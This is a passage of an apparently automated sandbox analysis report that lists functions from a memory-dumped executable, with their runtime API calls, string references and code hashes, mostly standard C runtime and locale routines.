Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 4fdb6a6f4f3fbf83b50a3329c2bf29d54d26b012b05bc46d5cb2dcd387fb5150
Instruction ID: 2038a78c9f2c6ab5aa77915447cd90bc58c544980ef2bdbb1770737e81730e01
Opcode Fuzzy Hash: 4fdb6a6f4f3fbf83b50a3329c2bf29d54d26b012b05bc46d5cb2dcd387fb5150
Instruction Fuzzy Hash: D801D6B8900725DFC7A5DF68C540A5DBBF0BF18708B50885DE989DB710D771EA45CB80

Uniqueness

Uniqueness Score: -1.00%

Function 01337E20 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,013369EF,?,0133D85F,?,00000000,?,01342A90,00000000,013369EF,00000000,?,?,?,013367E9), ref: 01337E52

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 93a952b5947f7482ea4b6c23d798a6ade5579318260a20d62bbee27cc8f4de96
Instruction ID: 80f31d13b565f2e0d3f99628a23561c69a3d00af5eab39107d3fce998525c092
Opcode Fuzzy Hash: 93a952b5947f7482ea4b6c23d798a6ade5579318260a20d62bbee27cc8f4de96
Instruction Fuzzy Hash: 93E0EDB120162A6BE6312B7D9C00B5B7A5D9FC1AF8F150020AE18AA180CB21DC0082FD

Uniqueness

Uniqueness Score: -1.00%

Function 01327341 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::ios_base::_Init.LIBCPMT ref: 01327347

Part of subcall function 0132704C: __EH_prolog3.LIBCMT ref: 01327053
Part of subcall function 0132704C: std::locale::_Init.LIBCPMT ref: 0132709C

Part of subcall function 0132798F: __EH_prolog3.LIBCMT ref: 01327996

Part of subcall function 013220C0: ___std_exception_copy.LIBVCRUNTIME ref: 0132215D

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: H_prolog3Init$___std_exception_copystd::ios_base::_std::locale::_
String ID:
API String ID: 2400365081-0
Opcode ID: 8df86ab7bb4ff7505743d2294992b24d1b3464ed4371a3d718b46fd2e1d3f304
Instruction ID: 9eaa00627ddc38ffeb5404b421886489710f1866611f58070711b3cb3a70ed03
Opcode Fuzzy Hash: 8df86ab7bb4ff7505743d2294992b24d1b3464ed4371a3d718b46fd2e1d3f304
Instruction Fuzzy Hash: 56F09B316007709BE730B67D9449B9BBBD5BF21738F10941EE58657681CAB9F444CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0132798F Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 01327996

Part of subcall function 01326967: __EH_prolog3.LIBCMT ref: 0132696E
Part of subcall function 01326967: std::_Lockit::_Lockit.LIBCPMT ref: 01326978
Part of subcall function 01326967: std::_Lockit::~_Lockit.LIBCPMT ref: 013269E9

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
String ID:
API String ID: 1538362411-0
Opcode ID: ce20f36feb37c3c22ee9841a2d79d0a18428c8952e728e9381706c5aa28bbaca
Instruction ID: da8f8754eb7a30ac74fe8b4f363baf7f43712ec9782b66e4b7eee90cf8155257
Opcode Fuzzy Hash: ce20f36feb37c3c22ee9841a2d79d0a18428c8952e728e9381706c5aa28bbaca
Instruction Fuzzy Hash: 40E06DB9A0012AAFDF04FBA4C515AED77B5FF64359F200049D8026B381DF35AA1ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 01336957 Relevance: 1.5, APIs: 1, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0133695E

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 250c83494176d582f7690dcc2e38a0717d9b86e687a6a14e9efd21e8e5535945
Instruction ID: 0b8bd1dda22d23760cc2b2d5327b8bded9ecef4fe533cfe4f9181b3608d4666d
Opcode Fuzzy Hash: 250c83494176d582f7690dcc2e38a0717d9b86e687a6a14e9efd21e8e5535945
Instruction Fuzzy Hash: 7BE09AB6D0021EAADF40EFE8C452FEFB7BCAF14319F604056D205E6140EB7497488BA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01343323 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 01343507

Strings

1#QNAN, xrefs: 01343436
1#SNAN, xrefs: 0134342F
1#IND, xrefs: 01343428
1#INF, xrefs: 01343459

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: e3c846ea6d471794664f1a41c6ffae87e7a1f69aa0769c7f5fc4d6a8daa6eaa7
Instruction ID: 462c7142734b32fac956b9cde13bc3e2159a438644bb6816312d75d2dd57684e
Opcode Fuzzy Hash: e3c846ea6d471794664f1a41c6ffae87e7a1f69aa0769c7f5fc4d6a8daa6eaa7
Instruction Fuzzy Hash: 56D21671E082298BDB65CE28DD407EAB7F9FB44309F1445EAD44DE7240EB78AE858F41

Uniqueness

Uniqueness Score: -1.00%

Function 0134267D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,0134299B,00000002,00000000,?,?,?,0134299B,?,00000000), ref: 01342716
GetLocaleInfoW.KERNEL32(?,20001004,0134299B,00000002,00000000,?,?,?,0134299B,?,00000000), ref: 0134273F
GetACP.KERNEL32(?,?,0134299B,?,00000000), ref: 01342754

Strings

OCP, xrefs: 013426D1
ACP, xrefs: 0134269B

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: edfcde6bfd9f7abdde6fc517716a4b461d712c52d415041e70f3faf41a64a795
Instruction ID: cf0028150c47c3587ff3950a6e9ed49c14bc7f0f96d8ecdeb50a978cf63f5c63
Opcode Fuzzy Hash: edfcde6bfd9f7abdde6fc517716a4b461d712c52d415041e70f3faf41a64a795
Instruction Fuzzy Hash: DF21D875600104ABEB35CF69E900B977BE6EF44B6CB568464F90AF7116E732F941C360

Uniqueness

Uniqueness Score: -1.00%

Function 01342852 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 01339221: GetLastError.KERNEL32(?,00000000,01333664,?,?,00000000,?,00000003,0132F44B,?,?,?,?,00000000,?,?), ref: 01339225
Part of subcall function 01339221: SetLastError.KERNEL32(00000000,?,00000000,?,00000003,0132F44B,?,?,?,?,00000000,?,?,?,01336731,013552B8), ref: 013392C7

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0134295E
IsValidCodePage.KERNEL32(00000000), ref: 013429A7
IsValidLocale.KERNEL32(?,00000001), ref: 013429B6
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 013429FE
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 01342A1D

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 470b7b6a3d622279b9ddcd2a7bee3af0a1ebd9711b42f6cfc2de64fab91c063b
Instruction ID: b249371deacb30157b45133e248d508c61e94e36dbeac6f9582d7e1100b3c27c
Opcode Fuzzy Hash: 470b7b6a3d622279b9ddcd2a7bee3af0a1ebd9711b42f6cfc2de64fab91c063b
Instruction Fuzzy Hash: 97517175910206ABEF10DFA9EC40ABF7BF8BF54748F054469FA11F7150DB70AA548B60

Uniqueness

Uniqueness Score: -1.00%

Function 01341EEE Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 01339221: GetLastError.KERNEL32(?,00000000,01333664,?,?,00000000,?,00000003,0132F44B,?,?,?,?,00000000,?,?), ref: 01339225
Part of subcall function 01339221: SetLastError.KERNEL32(00000000,?,00000000,?,00000003,0132F44B,?,?,?,?,00000000,?,?,?,01336731,013552B8), ref: 013392C7

GetACP.KERNEL32(?,?,?,?,?,?,01335707,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 01341FAF
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,01335707,?,?,?,00000055,?,-00000050,?,?), ref: 01341FDA
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0134213D

Strings

utf8, xrefs: 013420AC

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: cf58e7f6d597109d63380bffeb5f4a2154a4a4997c77bfa9ef8066e552ef918c
Instruction ID: 03e0f1021a6422ee36c14be485df32e5fb570f0c8df258480f8d491deea28e8b
Opcode Fuzzy Hash: cf58e7f6d597109d63380bffeb5f4a2154a4a4997c77bfa9ef8066e552ef918c
Instruction Fuzzy Hash: C5711871A00606ABEB25AB7DDC41BAB77ECEF58318F004129FA05E7180EB70F581C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0133802F Relevance: 6.3, APIs: 4, Instructions: 337COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 013380BC

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: f779180b85af581e06eedbf0b313eb824dd96dc620a2ee1e28a0d5b6ab5efbde
Instruction ID: 095f123047bdd8723bbfd93ff0e74719528640517817a9941d641e307163d333
Opcode Fuzzy Hash: f779180b85af581e06eedbf0b313eb824dd96dc620a2ee1e28a0d5b6ab5efbde
Instruction Fuzzy Hash: D0B15A32D056469FDB168F6CC8807FEBBA5EF95358F1483A6F904EB341D2349901C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 0132A555 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0132A561
IsDebuggerPresent.KERNEL32 ref: 0132A62D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0132A64D
UnhandledExceptionFilter.KERNEL32(?), ref: 0132A657

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 3c08aca239615e8d20fad08887bf28c65d34c1a820cda17c9237a17818767bcf
Instruction ID: f392f71357a7552a6f3a6e68dbef2396c7ed860cf0d5142cc87669f38ba24ff5
Opcode Fuzzy Hash: 3c08aca239615e8d20fad08887bf28c65d34c1a820cda17c9237a17818767bcf
Instruction Fuzzy Hash: 01313A75D1132CDBDB20EFA5D989BCDBBB8AF08704F1040EAE409A7250EB745A848F04

Uniqueness

Uniqueness Score: -1.00%

Function 01342301 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 01339221: GetLastError.KERNEL32(?,00000000,01333664,?,?,00000000,?,00000003,0132F44B,?,?,?,?,00000000,?,?), ref: 01339225
Part of subcall function 01339221: SetLastError.KERNEL32(00000000,?,00000000,?,00000003,0132F44B,?,?,?,?,00000000,?,?,?,01336731,013552B8), ref: 013392C7

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 01342355
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0134239F
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 01342465

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: fcfba62ae5d255f11d146fec56813c6eaf06068978fac726107c72e590af9945
Instruction ID: 1c7d9461584815788bfb8e5aeadfa9931cca6664765c00bf16162d8ef8f2542f
Opcode Fuzzy Hash: fcfba62ae5d255f11d146fec56813c6eaf06068978fac726107c72e590af9945
Instruction Fuzzy Hash: 736181715502079FEB299F2CEC81BABB7F8EF14318F5040B9E906E6685EB74E941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01330D71 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 01330E69
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 01330E73
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 01330E80

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: b3ff11c9d5beffe94aa347d69717e30f1813df4fdc294b4f893dded002ec5a4b
Instruction ID: 6c92e84413184f034c8de8c0b8a958ba846d9d82716b00dd9e23fdf7f58525f8
Opcode Fuzzy Hash: b3ff11c9d5beffe94aa347d69717e30f1813df4fdc294b4f893dded002ec5a4b
Instruction Fuzzy Hash: E131E47491132DABCB21EF68D88878DBBB8BF08714F5045EAE41CA7250EB749B858F44

Uniqueness

Uniqueness Score: -1.00%

Function 013336B0 Relevance: 3.4, APIs: 2, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64d7b49ac23c98b739a5c6f396f25498a1f170e13fbd3058c3bc2d87a3afe990
Instruction ID: 759dc60bcef9bc09ba79c9a6f0107d87ac7e030fc8e9c5490575b1b37744ca1b
Opcode Fuzzy Hash: 64d7b49ac23c98b739a5c6f396f25498a1f170e13fbd3058c3bc2d87a3afe990
Instruction Fuzzy Hash: F6F13E71E012199FDF14CFADC880AADBBB1FF88328F158269D915AB391D730A945CB94

Uniqueness

Uniqueness Score: -1.00%

Function 01323030 Relevance: 2.9, Strings: 2, Instructions: 448COMMON

Download Yara Rule

Strings

+, xrefs: 01323496
%, xrefs: 013234A9

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID:
String ID: %$+
API String ID: 0-2626897407
Opcode ID: 54640d564ded82dae49909599459addea3c52a7fd5c142ca78666a4561fb0af4
Instruction ID: 629ee21fcf8d04ad75479a555b9c6ab7ff0d6d69bfca577f905212b553789db6
Opcode Fuzzy Hash: 54640d564ded82dae49909599459addea3c52a7fd5c142ca78666a4561fb0af4
Instruction Fuzzy Hash: CAF1C0325083659FD715EF28C840A6FBBF9FF99708F044A1DF985A7241D738E9448B92

Uniqueness

Uniqueness Score: -1.00%

Function 013398BA Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,013398B5,00000000,?,00000008,?,?,01345531,00000000), ref: 01339AE7

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 606a02059d81d1011aecb0f1ff815e065ed748cba8440195f50e7f339501f2df
Instruction ID: e4171cb4e87b2f31dfbbf13819c7e2b187c133f115cf0a1e1140661150cbbb51
Opcode Fuzzy Hash: 606a02059d81d1011aecb0f1ff815e065ed748cba8440195f50e7f339501f2df
Instruction Fuzzy Hash: 08B13931610609CFEB19CF2CC486B657BA0FF8536DF158658E99ACF2A1C375E982CB44

Uniqueness

Uniqueness Score: -1.00%

Function 0132A01C Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0132A032

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 013b30ed2d457024dac71637e566e125699d4aec2576e60c56589f9951aec35e
Instruction ID: 54864430b0613a33cb3dba4ac1b5303b5d0fa74e26e757851a6f772a4af5cc77
Opcode Fuzzy Hash: 013b30ed2d457024dac71637e566e125699d4aec2576e60c56589f9951aec35e
Instruction Fuzzy Hash: 9B51A2B1D00319CFEB25CF58D981BAABBF4FB48358F24816AC502EB655E374E940CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0133F33A Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c931ecf88d3e1b206b4a5613eb5c1ed9a1588834fb345db6877a4805a8a6c26
Instruction ID: 9f278c94e1cebd1f4e1d8850e5827a99b819ca067027f54c068aa17e19450513
Opcode Fuzzy Hash: 9c931ecf88d3e1b206b4a5613eb5c1ed9a1588834fb345db6877a4805a8a6c26
Instruction Fuzzy Hash: F741B5B5C0521DAFDF20DF6DCC88AAABBBCAF85204F5442D9E448E3200D6359E858F14

Uniqueness

Uniqueness Score: -1.00%

Function 01342554 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 01339221: GetLastError.KERNEL32(?,00000000,01333664,?,?,00000000,?,00000003,0132F44B,?,?,?,?,00000000,?,?), ref: 01339225
Part of subcall function 01339221: SetLastError.KERNEL32(00000000,?,00000000,?,00000003,0132F44B,?,?,?,?,00000000,?,?,?,01336731,013552B8), ref: 013392C7

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 013425A8

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 390b0e27d091955197540df65942d0c836bb42cc9d9bb7e663d19086c06b4759
Instruction ID: 0b166c1c39726ca47b2d145f3de680abf32ee866304675609b71bbf978e6df51
Opcode Fuzzy Hash: 390b0e27d091955197540df65942d0c836bb42cc9d9bb7e663d19086c06b4759
Instruction Fuzzy Hash: B9217471515216ABEF289A19EC45A7B77E8EF44318F10007AF905E6141EB78E940D794

Uniqueness

Uniqueness Score: -1.00%

Function 0132FD0C Relevance: 1.6, Strings: 1, Instructions: 314COMMON

Download Yara Rule

Strings

0, xrefs: 0132FE96

Memory Dump Source

